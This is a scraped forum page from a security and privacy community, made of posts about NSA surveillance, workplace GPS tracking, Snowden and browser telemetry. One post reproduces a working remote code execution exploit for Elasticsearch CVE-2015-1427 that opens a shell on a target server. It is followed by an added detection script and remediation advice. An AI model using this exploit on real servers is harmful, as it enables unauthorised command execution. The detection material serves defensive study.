Fighting all the things that threaten privacy, security and our Internet

Shannon Morse
moderator

Discussion  - 
 
Ring ring! This is the NSA, this call isn’t currently being recorded, but the IRS is giving out your information, and so are adult dating websites...

rami ram

Security  - 
 
The NSA developed a plan to deliver malware through Google and Samsung app stores, according to newly published documents obtained by Edward Snowden and published by The Intercept. The documents...
 
 
Perhaps we will finally have secure medical devices with these new guidelines.
 
yes it is.

Alan Char

Security  - 
 
Is 1 million frequent flyer miles on United a prize or a penalty?

rami ram

Privacy  - 
 
An employee is fired after disabling a GPS application that followed her movements outside working hours
Myrna Arias, a resident of California Center, filed a complaint against her former employer Intermex, having been referred unfairly.

Intermex is a company specializing in the transfer of money abroad. During a brief stint at the company as a sales representative, Arias generated an average of $7,250 per month for the company. She also met all of her monthly goals, but that did not stop her employer from firing her. The reason is that she uninstalled a work application that she and her colleagues were forced to run at all times.

The iPhone application, known as Xora, allows a supervisor to monitor subordinates while they travel during work hours. This might appear legitimate if the supervisor wants to ensure that the team is indeed with customers and does not waste time doing other things during the hours reserved for work.

But Myrna Arias said she was fed up when she learned that the application followed her movements 24 hours a day, 7 days a week. Xora provides an option to disable the application; however, this option does not stop the GPS tracking feature.

John Stubits, Arias's boss, also boasted of being able to track all her trips outside of working hours, even when she was on leave. It is with pleasure that he claimed to know "how fast she was driving at specific times since she installed the app on her phone" and the time she spent with clients, says the complaint to the Kern County Superior Court.

As explained by the complainant, "she had no problem with the GPS feature of the application during working hours, but she objected to the monitoring of her location outside of working hours and complained to Stubits that it was an invasion of her privacy." She compared the tracking application on the iPhone to a "prisoner's ankle bracelet" and therefore uninstalled it from her phone.

After she was reprimanded for her action, Mr. John Stubits was quick to fire her, despite her work performance. Mrs Arias believes that the termination of her contract was "in violation of fundamental public policies, and substantial base in the state of California." She filed a complaint, claiming damages of more than $500,000 for breach of privacy. She also complains of unfair trade practices by her former employer.

Rick Webb

Discussion  - 
 
The irony of posting this on G+ is not wasted on me. That said, I am wondering if there is community interest in making a secure version of Android, one that out of the box does not connect all your details to Google etc. Pre-installed secure messaging apps. No Google apps that can't be removed etc.
 
Thanks, I will give these a look

Hak5

Discussion  - 
 
https://youtu.be/wzXVTC7cOWY

#NSA Metadata Collection is illegal, #SKYNET is Real, #Microsoft axes Patch Tuesday - ThreatWire

The NSA Program to collect bulk call data "metadata" has been ruled illegal by an appeals court. Leaked documents uncover SKYNET - an NSA program to target terrorists with such metadata. And Microsoft ends its monthly sysadmin-happy-fun-time which was Patch Tuesday.

Support #ThreatWire! https://www.patreon.com/ThreatWire

rami ram

Privacy  - 
 
Bulk collection of millions of Americans’ phone records is ruled unlawful, as opponents of program including Rand Paul share their delight
 
They need to use this technology to help improve consumer speech recognition products. I mean, some of the stuff they create had potential, it just needs used for proper means!

About this community

ThreatWire by Hak5 is a YouTube show covering the security and privacy issues threatening our Internet. From breaches and policies to social networks and censorship, ThreatWire takes the practical and tinfoil hat angles to dispel fear, uncertainty and doubt.

rami ram

Privacy  - 
 
Tonight, the US Senate failed to move ahead with the USA Freedom Act, an NSA reform bill that would address phone record surveillance and FISA Court transparency and fairness. It also was unable to muster votes for a temporary reauthorization of Section 215 of the Patriot Act, the section of law used to justify the mass phone records surveillance program. That’s good news: if the Senate stalemate continues, the mass surveillance of everyone’s pho...

rami ram

Security  - 
 
ElasticSearch Unauthenticated Remote code execution
Not secure anymore!

Darren Martyn, Xiphos researchers found a way to exploit remote elastic users through a vulnerable Java class (java.lang.Math.class.forName)

Here is the script as follows:
#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
_version_ = "20150309.1"
 
def banner():
    print """\x1b[1;32m
▓█████  ██▓    ▄▄▄        ██████ ▄▄▄█████▓ ██▓ ▄████▄    ██████  ██░ ██ ▓█████  ██▓     ██▓   
▓█   ▀ ▓██▒   ▒████▄    ▒██    ▒ ▓  ██▒ ▓▒▓██▒▒██▀ ▀█  ▒██    ▒ ▓██░ ██▒▓█   ▀ ▓██▒    ▓██▒   
▒███   ▒██░   ▒██  ▀█▄  ░ ▓██▄   ▒ ▓██░ ▒░▒██▒▒▓█    ▄ ░ ▓██▄   ▒██▀▀██░▒███   ▒██░    ▒██░   
▒▓█  ▄ ▒██░   ░██▄▄▄▄██   ▒   ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒  ▒   ██▒░▓█ ░██ ▒▓█  ▄ ▒██░    ▒██░   
░▒████▒░██████▒▓█   ▓██▒▒██████▒▒  ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓  ░▒▒   ▓▒█░▒ ▒▓▒ ▒ ░  ▒ ░░   ░▓  ░ ░▒ ▒  ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓  ░░ ▒░▓  ░
 ░ ░  ░░ ░ ▒  ░ ▒   ▒▒ ░░ ░▒  ░ ░    ░     ▒ ░  ░  ▒   ░ ░▒  ░ ░ ▒ ░▒░ ░ ░ ░  ░░ ░ ▒  ░░ ░ ▒  ░
   ░     ░ ░    ░   ▒   ░  ░  ░    ░       ▒ ░░        ░  ░  ░   ░  ░░ ░   ░     ░ ░     ░ ░  
   ░  ░    ░  ░     ░  ░      ░            ░  ░ ░            ░   ░  ░  ░   ░  ░    ░  ░    ░  ░
                                              ░                                               
 Exploit for ElasticSearch , CVE-2015-1427   Version: %s\x1b[0m""" %(__version__)
 
def execute_command(target, command):
    payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
    try:
        url = "http://%s:9200/_search?pretty" %(target)
        r = requests.post(url=url, data=payload)
    except Exception, e:
        sys.exit("Exception Hit"+str(e))
    values = json.loads(r.text)
    fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
    print fuckingjson.strip()
         
 
def exploit(target):
    print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
    while True:
        cmd = raw_input("~$ ")
        if cmd == "exit":
            sys.exit("{!} Shell exiting!")
        else:
            execute_command(target=target, command=cmd)
     
def main(args):
    banner()
    if len(args) != 2:
        sys.exit("Use: %s target" %(args[0]))
    exploit(target=args[1])
 
if _name_ == "__main__":
    main(args=sys.argv)
Add a comment...
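A defensive counterpart to the script in the post above, added here as an example (it is not part of the original post or the researcher's code): a check that walks the JSON body of a `_search` request and flags any `script` value using the reflection chain the payload relies on. The function names and the indicator list are this example's own assumptions, and both sample bodies are constructed.

```python
import json
import re

# Reflection / process-execution markers seen in the payload quoted in the post.
INDICATORS = {
    "class-literal": re.compile(r"\.class\b"),
    "forName": re.compile(r"\bforName\s*\("),
    "java.lang.Runtime": re.compile(r"java\.lang\.Runtime"),
    "getRuntime": re.compile(r"\bgetRuntime\s*\("),
    "exec": re.compile(r"\.exec\s*\("),
}

def _scripts(node, path=""):
    """Yield (json_path, script_source) for every string stored under a 'script' key."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            if key == "script" and isinstance(value, str):
                yield here, value
            else:
                yield from _scripts(value, here)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from _scripts(item, f"{path}[{i}]")

def flag_search_body(body):
    """Return [(json_path, [indicator names])] for suspicious scripts in a _search body."""
    try:
        candidates = list(_scripts(json.loads(body)))
    except ValueError:
        # Unparseable body: scan the raw text rather than letting it pass unchecked.
        candidates = [("<raw>", body)]
    findings = []
    for where, source in candidates:
        hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
        if hits:
            findings.append((where, hits))
    return findings

# Constructed sample bodies (not captured traffic); the command is a placeholder.
SUSPICIOUS = json.dumps({"size": 1, "script_fields": {"lupin": {"script":
    'java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("PLACEHOLDER").getText()'}}})
BENIGN = json.dumps({"script_fields": {"doubled": {"script": "doc['price'].value * 2"}}})

if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, flag_search_body(body))
```

Pattern matching of this kind is a detection aid for proxy or request logs, not a fix. The remediation for CVE-2015-1427 is upgrading Elasticsearch or setting `script.groovy.sandbox.enabled: false` in `elasticsearch.yml`, and port 9200 should not be reachable from untrusted networks.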

Shannon Morse
moderator

Discussion  - 
 
Mobile Encryption, Safari Browser’s Flaw, Laplace’s Demon, and Hackers on a Plane! - Threat Wire: http://youtu.be/KLG5dfPm2mw?a  
 
I believed in Laplace's Demon until I understood more about quantum physics and truly random events. 

rami ram

Privacy  - 
 
By default, the Mozilla Firefox browser sends reports concerning health & bugs occurring, to be fixed in the next release, but one thing trickled my nerds once: what if I get hijacked without knowing & my Firefox reports go somewhere else rather than to the Firefox dev team!!
More again: an option I found on Firefox browser 38.0.1 was data sharing, which is enabled BY DEFAULT!!!

I turned it off right after it caught my eye :)

Ummmmm; started taking care even from Firefox now :(

rami ram

Privacy  - 
 
Tails, the operating system trusted by Edward Snowden, just released a new version. Here's what you'll find in it, as well as what all the Tails hub-bub is about.

Alan Char

Privacy  - 
 
Your prescription records aren't private.
 
Alternatively: "Prescription drug database access, a warrantless activity"
Authorities dig through prescription med databases thanks to pre-digital age precedent.

rami ram

Privacy  - 
 
Edward Snowden says Australia’s new data retention laws are 'dangerous'

Whistleblower says mass surveillance did not stop the Sydney siege, the Boston marathon bombings or the Charlie Hebdo magazine attack in Paris

Edward Snowden has called Australia’s new data retention laws “dangerous” and insisted mass surveillance has allowed acts of terror to occur rather than foiled attacks.
Snowden, the whistleblower who revealed the extent of surveillance conducted by the US National Security Agency, told a Melbourne audience Australia is adopting data retention laws that “have been proven not to work”.
“Australia’s role in mass surveillance around the world is similar to the UK and the Tempora program,” Snowden said via satellite from Moscow.
“They’ll collect everyone’s communications, it’s called pre-criminal investigation, which means they are watching everyone all the time. They can search through that information not just in Australia but also share with overseas governments such as the US and UK. And it happens without oversight.”
Australia’s metadata laws were passed in March. They require telecommunications companies to store information on their customers for up to two years; a move the federal government has said will help combat terrorism.
Snowden, who was appearing at the Progress 2015 conference on Friday evening, said such laws are a “radical departure from the operation of traditional liberal societies around the world”.
“The impacts of metadata can’t be overstated, they are collecting data on everyone regardless of wrongdoing. When you have metadata, it’s a proxy for content, so when politicians split hairs about metadata you should be very sceptical.”
Snowden said mass surveillance had not stopped the Sydney siege, the Boston marathon bombings or the attack on the Charlie Hebdo magazine in France.
“These were people who have a long record and the reason these attacks happened isn’t because we didn’t have enough surveillance, it’s that we had too much,” he said. “We didn’t prioritise because we’d wasted too many resources watching people who didn’t present a threat.”
Snowden said governments needed to cooperate to avoid a world “where we choose between surveillance and security”.
The former NSA computer contractor, who first revealed details of mass surveillance to the Guardian in 2013, spoke on the same day a US federal court ruled mass storage of telephone data was illegal.
Snowden said the ruling was “very significant” and could lead to further legal challenges of mass surveillance.
He also criticised Australia’s attorney general, George Brandis, claiming he “doesn’t even know what metadata is”, and said people who say they don’t worry about their privacy because they have nothing to hide “is like saying I don’t care about free speech because I have nothing to say”.
Greens senator Scott Ludlam, who took part in a panel discussion with Snowden, said intelligence agencies in Australia operate with the “bare minimum of scrutiny”.
“The debate in Australia is so stifled,” he said. “In Australia we’re told these people are traitors, they are a national security threat and to just trust the government as everything will be fine.
“Civil society needs to be stronger on this stuff or we’ll be done over again.”

Source: theguardian 09/05/2015